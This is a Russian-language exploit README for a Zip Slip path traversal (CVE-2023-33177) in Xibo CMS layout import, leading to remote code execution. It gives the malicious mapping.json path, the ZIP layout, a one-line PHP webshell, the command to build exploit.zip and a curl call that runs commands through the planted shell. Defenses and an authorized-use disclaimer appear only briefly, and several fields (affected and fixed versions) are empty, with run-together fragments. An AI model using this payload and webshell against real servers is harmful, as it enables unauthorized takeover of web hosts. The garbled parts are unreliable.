
Этот эксплойт демонстрирует **уязвимость обхода пути** в Xibo CMS (CVE-2023-33177), которая позволяет удаленно выполнять код через импорт вредоносных макетов.
Этот эксплойт демонстрирует уязвимость обхода пути в Xibo CMS (CVE-2023-33177), которая позволяет удаленное выполнение кода через вредоносные импорты макетов.
CVE/Рекомендация: CVE-2023-33177 Затронутые версии:
Тип уязвимости: Обход пути (Zip Slip) Воздействие: Удаленное выполнение кода (RCE)
Xibo CMS позволяет аутентифицированным пользователям импортировать файлы макетов через ZIP-архивы. Функция импорта не выполняет должную проверку путей файлов в файле mapping.json, что позволяет злоумышленнику записывать файлы за пределами целевой директории библиотеки с использованием последовательностей обхода пути (../../).
mapping.json: Использует в качестве пути файла../../web/shell.phplibrary/../../web/shell.php/var/www/cms/web/shell.phpZip contains: library/../../web/shell.php
Xibo reads: library/ + ../../web/shell.php (from mapping.json)
Xibo writes: /var/www/cms/library/temp/ + ../../web/shell.php
Result: /var/www/cms/web/shell.php ← Webshell in web root!
python3 create_exploit.py
Это создает exploit.zip, содержащий вредоносный пакет макета.
xibo_admin / password)exploit.zipcurl 'http://localhost:8080/shell.php?cmd=id'
Эксплойт ZIP содержит:
exploit.zip
├── layout.json # Valid Xibo layout definition
├── playlist.json # Empty playlist (triggers JSON import)
├── mapping.json # Contains path traversal payload
└── library/
└── ../../web/
└── shell.php # PHP webshell (gets extracted to web root)
Встроенный веб-шелл минимален:
<?php system($_GET["cmd"]); ?>
Доступ к нему: http://<target>/shell.php?cmd=<command>
Исправленные версии:
Стратегии защиты:
.. или абсолютные путиЭтот эксплойт предоставлен для:
Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
complexusprada Ноябрь 2025